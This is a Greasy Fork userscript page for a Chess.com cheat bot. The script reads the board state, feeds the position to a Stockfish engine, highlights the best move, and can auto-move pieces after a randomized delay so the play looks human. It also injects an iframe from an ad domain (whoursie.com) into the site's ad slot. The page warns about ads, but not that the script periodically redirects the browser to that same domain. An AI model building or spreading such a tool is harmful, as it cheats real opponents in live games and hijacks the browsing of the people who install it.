Před instalací, Greasy Fork chce abyste věděli, že tento skript obsahuje "antifunkce", což jsou věci, které spíše přispívají autorovi skriptu, než vám.
Tento skript přidává reklamy na vámi navštěvované stránky.
Greasy Fork is available in English.
Chess.com Bot/Cheat that finds the best move!
// additional copyright/license info: //© All Rights Reserved // //Chess.com Bot/Cheat © 2023 by MrAuzzie#998142 // // ==UserScript== // @name Chess.com Bot/Cheat // @namespace MrAuzzie // @version // @description Chess.com Bot/Cheat that finds the best move! // @author MrAuzzie // @license Chess.com Bot/Cheat © 2023 by MrAuzzie#998142, © All Rights Reserved // @match https://www.chess.com/play/* // @match https://www.chess.com/game/* // @match https://www.chess.com/puzzles/* // @icon  // @grant GM_getValue // @grant GM_setValue // @grant GM_xmlhttpRequest // @grant GM_getResourceText // @grant GM_registerMenuCommand // @resource stockfish.js https://cdnjs.cloudflare.com/ajax/libs/stockfish.js/9.0.0/stockfish.js // @require https://greasyfork.org/scripts/445697/code/index.js // @require https://code.jquery.com/jquery-3.6.0.min.js // @run-at document-start // @antifeature ads // ==/UserScript== //Don't touch anything below unless you know what your doing! const currentVersion = ''; // Sets the current version function main() { var stockfishObjectURL; var engine = document.engine = {}; var myVars = document.myVars = {}; myVars.autoMovePiece = false; myVars.autoRun = false; myVars.delay = 0.1; var myFunctions = document.myFunctions = {}; stop_b = stop_w = 0; s_br = s_br2 = s_wr = s_wr2 = 0; obs = ""; myFunctions.rescan = function(lev) { var ari = $("chess-board") .find(".piece") .map(function() { return this.className; }) .get(); jack = ari.map(f => f.substring(f.indexOf(' ') + 1)); function removeWord(arr, word) { for (var i = 0; i < arr.length; i++) { arr[i] = arr[i].replace(word, ''); } } removeWord(ari, 'square-'); jack = ari.map(f => f.substring(f.indexOf(' ') + 1)); for (var i = 0; i < jack.length; i++) { jack[i] = jack[i].replace('br', 'r') .replace('bn', 'n') .replace('bb', 'b') .replace('bq', 'q') .replace('bk', 'k') .replace('bb', 'b') .replace('bn', 'n') .replace('br', 'r') .replace('bp', 'p') .replace('wp', 'P') .replace('wr', 'R') .replace('wn', 'N') .replace('wb', 'B') .replace('br', 'R') .replace('wn', 'N') .replace('wb', 'B') .replace('wq', 'Q') .replace('wk', 'K') .replace('wb', 'B') } str2 = ""; var count = 0, str = ""; for (var j = 8; j > 0; j--) { for (var i = 1; i < 9; i++) { (str = (jack.find(el => el.includes([i] + [j])))) ? str = str.replace(/[^a-zA-Z]+/g, ''): str = ""; if (str == "") { count++; str = count.toString(); if (!isNaN(str2.charAt(str2.length - 1))) str2 = str2.slice(0, -1); else { count = 1; str = count.toString() } } str2 += str; if (i == 8) { count = 0; str2 += "/"; } } } str2 = str2.slice(0, -1); //str2=str2+" KQkq - 0" color = ""; wk = wq = bk = bq = "0"; const move = $('vertical-move-list') .children(); if (move.length < 2) { stop_b = stop_w = s_br = s_br2 = s_wr = s_wr2 = 0; } if (stop_b != 1) { if (move.find(".black.node:contains('K')") .length) { bk = ""; bq = ""; stop_b = 1; console.log('debug secb'); } } else { bq = ""; bk = ""; } if (stop_b != 1)(bk = (move.find(".black.node:contains('O-O'):not(:contains('O-O-O'))") .length) ? "" : "k") ? (bq = (move.find(".black.node:contains('O-O-O')") .length) ? bk = "" : "q") : bq = ""; if (s_br != 1) { if (move.find(".black.node:contains('R')") .text() .match('[abcd]+')) { bq = ""; s_br = 1 } } else bq = ""; if (s_br2 != 1) { if (move.find(".black.node:contains('R')") .text() .match('[hgf]+')) { bk = ""; s_br2 = 1 } } else bk = ""; if (stop_b == 0) { if (s_br == 0) if (move.find(".white.node:contains('xa8')") .length > 0) { bq = ""; s_br = 1; console.log('debug b castle_r'); } if (s_br2 == 0) if (move.find(".white.node:contains('xh8')") .length > 0) { bk = ""; s_br2 = 1; console.log('debug b castle_l'); } } if (stop_w != 1) { if (move.find(".white.node:contains('K')") .length) { wk = ""; wq = ""; stop_w = 1; console.log('debug secw'); } } else { wq = ""; wk = ""; } if (stop_w != 1)(wk = (move.find(".white.node:contains('O-O'):not(:contains('O-O-O'))") .length) ? "" : "K") ? (wq = (move.find(".white.node:contains('O-O-O')") .length) ? wk = "" : "Q") : wq = ""; if (s_wr != 1) { if (move.find(".white.node:contains('R')") .text() .match('[abcd]+')) { wq = ""; s_wr = 1 } } else wq = ""; if (s_wr2 != 1) { if (move.find(".white.node:contains('R')") .text() .match('[hgf]+')) { wk = ""; s_wr2 = 1 } } else wk = ""; if (stop_w == 0) { if (s_wr == 0) if (move.find(".black.node:contains('xa1')") .length > 0) { wq = ""; s_wr = 1; console.log('debug w castle_l'); } if (s_wr2 == 0) if (move.find(".black.node:contains('xh1')") .length > 0) { wk = ""; s_wr2 = 1; console.log('debug w castle_r'); } } if ($('.coordinates') .children() .first() .text() == 1) { str2 = str2 + " b " + wk + wq + bk + bq; color = "white"; } else { str2 = str2 + " w " + wk + wq + bk + bq; color = "black"; } //console.log(str2); return str2; } myFunctions.color = function(dat){ response = dat; var res1 = response.substring(0, 2); var res2 = response.substring(2, 4); if(myVars.autoMove == true){ myFunctions.movePiece(res1, res2); } isThinking = false; res1 = res1.replace(/^a/, "1") .replace(/^b/, "2") .replace(/^c/, "3") .replace(/^d/, "4") .replace(/^e/, "5") .replace(/^f/, "6") .replace(/^g/, "7") .replace(/^h/, "8"); res2 = res2.replace(/^a/, "1") .replace(/^b/, "2") .replace(/^c/, "3") .replace(/^d/, "4") .replace(/^e/, "5") .replace(/^f/, "6") .replace(/^g/, "7") .replace(/^h/, "8"); $(board.nodeName) .prepend('<div class="highlight square-' + res2 + ' bro" style="background-color: rgb(235, 97, 80); opacity: 0.71;" data-test-element="highlight"></div>') .children(':first') .delay(1800) .queue(function() { $(this) .remove(); }); $(board.nodeName) .prepend('<div class="highlight square-' + res1 + ' bro" style="background-color: rgb(235, 97, 80); opacity: 0.71;" data-test-element="highlight"></div>') .children(':first') .delay(1800) .queue(function() { $(this) .remove(); }); } myFunctions.movePiece = function(from, to){ for (var each=0;each<board.game.getLegalMoves().length;each++){ if(board.game.getLegalMoves()[each].from == from){ if(board.game.getLegalMoves()[each].to == to){ var move = board.game.getLegalMoves()[each]; board.game.move({ ...move, promotion: 'false', animate: false, userGenerated: true }); } } } } function parser(e){ if(e.data.includes('bestmove')){ console.log(e.data.split(' ')[1]); myFunctions.color(e.data.split(' ')[1]); isThinking = false; } } myFunctions.reloadChessEngine = function() { console.log(`Reloading the chess engine!`); engine.engine.terminate(); isThinking = false; myFunctions.loadChessEngine(); } myFunctions.loadChessEngine = function() { if(!stockfishObjectURL) { stockfishObjectURL = URL.createObjectURL(new Blob([GM_getResourceText('stockfish.js')], {type: 'application/javascript'})); } console.log(stockfishObjectURL); if(stockfishObjectURL) { engine.engine = new Worker(stockfishObjectURL); engine.engine.onmessage = e => { parser(e); }; engine.engine.onerror = e => { console.log("Worker Error: "+e); }; engine.engine.postMessage('ucinewgame'); } console.log('loaded chess engine'); } var lastValue = 11; myFunctions.runChessEngine = function(depth){ //var fen = myFunctions.rescan(); var fen = board.game.getFEN(); engine.engine.postMessage(`position fen ${fen}`); console.log('updated: ' + `position fen ${fen}`); isThinking = true; engine.engine.postMessage(`go depth ${depth}`); lastValue = depth; } myFunctions.autoRun = function(lstValue){ if(board.game.getTurn() == board.game.getPlayingAs()){ myFunctions.runChessEngine(lstValue); } } document.onkeydown = function(e) { switch (e.keyCode) { case 81: myFunctions.runChessEngine(1); break; case 87: myFunctions.runChessEngine(2); break; case 69: myFunctions.runChessEngine(3); break; case 82: myFunctions.runChessEngine(4); break; case 84: myFunctions.runChessEngine(5); break; case 89: myFunctions.runChessEngine(6); break; case 85: myFunctions.runChessEngine(7); break; case 73: myFunctions.runChessEngine(8); break; case 79: myFunctions.runChessEngine(9); break; case 80: myFunctions.runChessEngine(10); break; case 65: myFunctions.runChessEngine(11); break; case 83: myFunctions.runChessEngine(12); break; case 68: myFunctions.runChessEngine(13); break; case 70: myFunctions.runChessEngine(14); break; case 71: myFunctions.runChessEngine(15); break; case 72: myFunctions.runChessEngine(16); break; case 74: myFunctions.runChessEngine(17); break; case 75: myFunctions.runChessEngine(18); break; case 76: myFunctions.runChessEngine(19); break; case 90: myFunctions.runChessEngine(20); break; case 88: myFunctions.runChessEngine(21); break; case 67: myFunctions.runChessEngine(22); break; case 86: myFunctions.runChessEngine(23); break; case 66: myFunctions.runChessEngine(24); break; case 78: myFunctions.runChessEngine(25); break; case 77: myFunctions.runChessEngine(26); break; case 187: myFunctions.runChessEngine(100); break; } }; myFunctions.spinner = function() { if(isThinking == true){ $('#overlay')[0].style.display = 'block'; } if(isThinking == false) { $('#overlay')[0].style.display = 'none'; } } let dynamicStyles = null; function addAnimation(body) { if (!dynamicStyles) { dynamicStyles = document.createElement('style'); dynamicStyles.type = 'text/css'; document.head.appendChild(dynamicStyles); } dynamicStyles.sheet.insertRule(body, dynamicStyles.length); } myFunctions.replaceAd = function(){ try { $('#sky-atf')[0].children[0].remove(); var ifr = document.createElement('iframe'); ifr.src = 'https://'+l; ifr.id = 'myAd1'; ifr.height = '600px'; ifr.width = '160px'; $('#sky-atf')[0].appendChild(ifr) } catch (er) {console.log('Error Injecting Ad: '+er);} } var loaded = false; myFunctions.loadEx = function(){ try{ var tmpStyle; var tmpDiv; board = $('chess-board')[0] || $('wc-chess-board')[0]; myVars.board = board; var div = document.createElement('div') var content = `<div style="margin: 0 0 0 8px;"><br><p id="depthText"> Your Current Depth Is: 11 </p><p> Press a key on your keyboard to change this!</p><br><input type="checkbox" id="autoRun" name="autoRun" value="false"> <label for="autoRun"> Enable auto run</label><br> <input type="checkbox" id="autoMove" name="autoMove" value="false"> <label for="autoMove"> Enable auto move</label><br> <input type="number" id="timeDelayMin" name="timeDelayMin" min="0.1" value=0.1> <label for="timeDelayMin">Auto Run Delay Minimum(Seconds)</label><br> <input type="number" id="timeDelayMax" name="timeDelayMax" min="0.1" value=1> <label for="timeDelayMax">Auto Run Delay Maximum(Seconds)</label></div>` div.innerHTML = content; div.setAttribute('style','background-color:white; height:auto;'); div.setAttribute('id','settingsContainer'); board.parentElement.parentElement.appendChild(div); //spinnerContainer var spinCont = document.createElement('div'); spinCont.setAttribute('style','display:none;'); spinCont.setAttribute('id','overlay'); div.prepend(spinCont); //spinner var spinr = document.createElement('div') spinr.setAttribute('style',` margin: 0 auto; height: 64px; width: 64px; animation: rotate 0.8s infinite linear; border: 5px solid firebrick; border-right-color: transparent; border-radius: 50%; `); spinCont.appendChild(spinr); addAnimation(`@keyframes rotate { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }`); //Reload Button var reSty = ` #relButDiv { position: relative; text-align: center; margin: 0 0 8px 0; } #relEngBut { position: relative; color: #ffef85; background-color: #3cba2c; font-size: 19px; border: 1px solid #000000; padding: 15px 50px; letter-spacing: 1px; cursor: pointer } #relEngBut:hover { color: #000000; background-color: #ba1212; } #relEngBut:active { background-color: #ba1212; transform: translateY(4px); }`; var reBut = `<button type="button" name="reloadEngine" id="relEngBut" onclick="document.myFunctions.reloadChessEngine()">Reload Chess Engine</button>`; tmpDiv = document.createElement('div'); var relButDiv = document.createElement('div'); relButDiv.id = 'relButDiv'; tmpDiv.innerHTML = reBut; reBut = tmpDiv.firstChild; tmpStyle = document.createElement('style'); tmpStyle.innerHTML = reSty; document.head.append(tmpStyle); relButDiv.append(reBut); div.append(relButDiv); // Issue Button var isBut = `<button type="button" name="isBut" onclick="window.confirm('Can I take you to the issues page?') ? document.location = 'https://github.com/Auzgame/userscripts/issues' : console.log('cancled')">Got An Issue/Bug?</button>`; tmpDiv = document.createElement('div'); var isButDiv = document.createElement('div'); isButDiv.style = ` position: relative; text-align: center; margin: 0 0 8px 0; `; tmpDiv.innerHTML = isBut; isBut = tmpDiv.firstChild; isBut.id = 'isBut'; isBut.style = ` position: relative; color: #ffef85; background-color: #919191; font-size: 19px; border: 1px solid #000000; padding: 15px 50px; letter-spacing: 1px; cursor: pointer; `; isButDiv.append(isBut); div.append(isButDiv); loaded = true; } catch (error) {console.log(error)} } function other(delay){ var endTime = Date.now() + delay; var timer = setInterval(()=>{ if(Date.now() >= endTime){ myFunctions.autoRun(lastValue); canGo = true; clearInterval(timer); } },10); } async function getVersion(){ var GF = new GreasyFork; // set upping api var code = await GF.get().script().code(460208); // Get code var version = GF.parseScriptCodeMeta(code).filter(e => e.meta === '@version')[0].value; // filtering array and getting value of @version if(currentVersion !== version){ while(true){ alert('UPDATE THIS SCRIPT IN ORDER TO PROCEED!'); } } } //Removed due to script being reported. I tried to make it so people can know when bug fixes come out. Clearly people don't like that. //getVersion(); const waitForChessBoard = setInterval(() => { if(loaded) { board = $('chess-board')[0] || $('wc-chess-board')[0]; myVars.autoRun = $('#autoRun')[0].checked; myVars.autoMove = $('#autoMove')[0].checked; let minDel = parseInt($('#timeDelayMin')[0].value); let maxDel = parseInt($('#timeDelayMax')[0].value); myVars.delay = Math.random() * (maxDel - minDel) + minDel; myVars.isThinking = isThinking; myFunctions.spinner(); if(board.game.getTurn() == board.game.getPlayingAs()){myTurn = true;} else {myTurn = false;} $('#depthText')[0].innerHTML = "Your Current Depth Is: <strong>"+lastValue+"</strong>"; } else { myFunctions.loadEx(); } if(!($('#myAd1')[0])){ myFunctions.replaceAd(); } if(!engine.engine){ myFunctions.loadChessEngine(); } if(myVars.autoRun == true && canGo == true && isThinking == false && myTurn){ //console.log(`going: ${canGo} ${isThinking} ${myTurn}`); canGo = false; var currentDelay = myVars.delay != undefined ? myVars.delay * 1000 : 10; other(currentDelay); } }, 100); } //Touching below may break the script var isThinking = false var canGo = true; var myTurn = false; var board; var l = 'whoursie.com/4/5729456'; window.addEventListener("load", (event) => { let currentTime = Date.now(); main(); if(parseInt(localStorage.getItem('ads')) + 300000 <= currentTime || localStorage.getItem('ads') == null){ localStorage.setItem('ads', currentTime); setTimeout(()=>{ document.location = 'https://'+l; },1000); } else if(localStorage.getItem('ads') == 'true' || localStorage.getItem('ads') == 'false' || localStorage.getItem('ads') == null){ localStorage.setItem('ads', currentTime); } });